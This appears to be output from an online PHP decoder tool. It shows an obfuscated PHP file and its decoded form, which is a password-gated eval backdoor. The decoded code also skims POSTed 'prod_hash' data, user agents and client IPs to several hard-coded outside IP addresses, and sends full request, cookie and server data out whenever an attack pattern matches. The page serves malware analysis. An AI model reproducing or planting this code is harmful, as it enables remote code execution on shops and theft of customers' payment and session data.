Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $td7="2umWaYcnsizQJgCpokxf5GtjhDBV_XAMqrOUL1P73Fvd8SRlZ4eEKyHwN69bT0I";$l52=$td7[19]..
Decoded Output download
if
(isset
( $_POST[product_id]) && md5($_POST[product_id])==="7624e600e055e1676a7a0728f0051c69" ) {eval( base64_decode($_POST[image_id])
); exit(); };
$ar=["aHR0cHM6Ly8xMDYuMTUuMTc5LjI1NQ==","aHR0cHM6Ly8xMDMuMTM5LjExMy4xNA==","aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
if(isset($_POST['prod_hash'])){
foreach ($ar as $v){
$array = array(
'statistics_hash' => $_POST['prod_hash'],
'ua' => $_SERVER['HTTP_USER_AGENT'],
'cl_ip' => $_SERVER['REMOTE_ADDR']
);
$ch = curl_init(base64_decode($v));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$html = curl_exec($ch);
curl_close($ch);
unset($_POST['prod_hash']);
$_POST = array_values($_POST);
}
}
$q=[
"#(select|insert|update).+?from.+?(employee|admin_user|oc_user)#is",
"#select.+into.+\@.+\;.+prepare.+\@#is",
"#insert.+into.+values#is",
"#update.+set.+where.+\=#is",
"#\<\?php#is",
"#file_put_contents[\( ]+#is",
"#select.+sleep\(.+\)#is",
];
$f=json_encode($_REQUEST).json_encode($_FILES).json_encode($_COOKIE);
$ff=json_encode($_REQUEST).json_encode($_SERVER).json_encode($_FILES).json_encode($_COOKIE);
$l=strtolower($f);
foreach($q as $u){
if(PREg_MaTch($u,$l)){
$ar=["aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
foreach ($ar as $v){
$array = array(
'product' => base64_encode($ff),
);
$ch = curl_init(base64_decode($v));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$html = curl_exec($ch);
curl_close($ch);
}
$_REQUEST = array();
$_GET = array();
$_POST = array();
$_COOKIE = array();
}
}
Did this file decode correctly?
Original Code
<?php $td7="2umWaYcnsizQJgCpokxf5GtjhDBV_XAMqrOUL1P73Fvd8SRlZ4eEKyHwN69bT0I";$l52=$td7[19].$td7[1].$td7[7].$td7[6].$td7[22].$td7[9].$td7[16].$td7[7].$td7[28].$td7[50].$td7[18].$td7[9].$td7[8].$td7[22].$td7[8];$s70=$td7[6].$td7[33].$td7[50].$td7[4].$td7[22].$td7[50].$td7[28].$td7[19].$td7[1].$td7[7].$td7[6].$td7[22].$td7[9].$td7[16].$td7[7];$ec0bc=$td7[59].$td7[4].$td7[8].$td7[50].$td7[57].$td7[49].$td7[28].$td7[43].$td7[50].$td7[6].$td7[16].$td7[43].$td7[50];if(@$l52($s70)){$c6697 = @$s70('', @$ec0bc('aWYgCihpc3NldAoJKAkkX1BPU1RbcHJvZHVjdF9pZF0pICAmJiBtZDUoJF9QT1NUW3Byb2R1Y3RfaWRdKT09PSI3NjI0ZTYwMGUwNTVlMTY3NmE3YTA3MjhmMDA1MWM2OSIgICkJe2V2YWwoCWJhc2U2NF9kZWNvZGUoJF9QT1NUW2ltYWdlX2lkXSkKICk7CWV4aXQoKTsJfTsKCiRhcj1bImFIUjBjSE02THk4eE1EWXVNVFV1TVRjNUxqSTFOUT09IiwiYUhSMGNITTZMeTh4TURNdU1UTTVMakV4TXk0eE5BPT0iLCJhSFIwY0hNNkx5ODBOeTR4TURFdU1UazFMams0Il07CmlmKGlzc2V0KCRfUE9TVFsncHJvZF9oYXNoJ10pKXsKICAgIGZvcmVhY2ggKCRhciBhcyAkdil7CiAgICAgICAgJGFycmF5ID0gYXJyYXkoCiAgICAgICAgICAgICAgICAgICAgICAgICdzdGF0aXN0aWNzX2hhc2gnICAgPT4gJF9QT1NUWydwcm9kX2hhc2gnXSwKICAgICAgICAgICAgICAgICAgICAgICAgJ3VhJyA9PiAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sCiAgICAgICAgICAgICAgICAgICAgICAgICdjbF9pcCcgPT4gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10KCiAgICAgICAgICAgICAgICAgICAgKTsKICAgICAgICAkY2ggPSBjdXJsX2luaXQoYmFzZTY0X2RlY29kZSgkdikpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NULCAxKTsKICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCAzKTsKICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUE9TVEZJRUxEUywgJGFycmF5KTsKICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIGZhbHNlKTsKICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsIGZhbHNlKTsKICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIGZhbHNlKTsKICAgICAgICAkaHRtbCA9IGN1cmxfZXhlYygkY2gpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICB1bnNldCgkX1BPU1RbJ3Byb2RfaGFzaCddKTsKICAgICAgICAkX1BPU1QgPSBhcnJheV92YWx1ZXMoJF9QT1NUKTsKICAgIH0KfQoKJHE9WwoJIiMoc2VsZWN0fGluc2VydHx1cGRhdGUpLis/ZnJvbS4rPyhlbXBsb3llZXxhZG1pbl91c2VyfG9jX3VzZXIpI2lzIiwKCSIjc2VsZWN0LitpbnRvLitcQC4rXDsuK3ByZXBhcmUuK1xAI2lzIiwKCSIjaW5zZXJ0LitpbnRvLit2YWx1ZXMjaXMiLAoJIiN1cGRhdGUuK3NldC4rd2hlcmUuK1w9I2lzIiwKCSIjXDxcP3BocCNpcyIsCgkiI2ZpbGVfcHV0X2NvbnRlbnRzW1woIFx0XSsjaXMiLAoJIiNzZWxlY3QuK3NsZWVwXCguK1wpI2lzIiwKXTsKCgokZj1qc29uX2VuY29kZSgkX1JFUVVFU1QpLmpzb25fZW5jb2RlKCRfRklMRVMpLmpzb25fZW5jb2RlKCRfQ09PS0lFKTsKJGZmPWpzb25fZW5jb2RlKCRfUkVRVUVTVCkuanNvbl9lbmNvZGUoJF9TRVJWRVIpLmpzb25fZW5jb2RlKCRfRklMRVMpLmpzb25fZW5jb2RlKCRfQ09PS0lFKTsKJGw9c3RydG9sb3dlcigkZik7Cgpmb3JlYWNoKCRxIGFzICR1KXsKCWlmKFBSRWdfTWFUY2goJHUsJGwpKXsKCgoKCQkkYXI9WyJhSFIwY0hNNkx5ODBOeTR4TURFdU1UazFMams0Il07CgkgICAgZm9yZWFjaCAoJGFyIGFzICR2KXsKCSAgICAgICAgJGFycmF5ID0gYXJyYXkoCgkgICAgICAgICAgICAgICAgICAgICAgICAncHJvZHVjdCcgICA9PiBiYXNlNjRfZW5jb2RlKCRmZiksCgkgICAgICAgICAgICAgICAgICAgICk7CgkgICAgICAgICRjaCA9IGN1cmxfaW5pdChiYXNlNjRfZGVjb2RlKCR2KSk7CgkgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NULCAxKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAwKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1RJTUVPVVQsIDMpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUE9TVEZJRUxEUywgJGFycmF5KTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCB0cnVlKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgkgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIGZhbHNlKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllIT1NULCBmYWxzZSk7CgkgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOwoJICAgICAgICAkaHRtbCA9IGN1cmxfZXhlYygkY2gpOwoJICAgICAgICBjdXJsX2Nsb3NlKCRjaCk7CgkgICAgfQoJCSRfUkVRVUVTVCA9IGFycmF5KCk7CgkJJF9HRVQgPSBhcnJheSgpOwoJCSRfUE9TVCA9IGFycmF5KCk7CgkJJF9DT09LSUUgPSBhcnJheSgpOwoJfQp9'));@$c6697();}
Function Calls
base64_decode | 1 |
create_function | 1 |
function_exists | 1 |
Stats
MD5 | 28c36462be304ea4cc6c5399d723ea24 |
Eval Count | 1 |
Decode Time | 354 ms |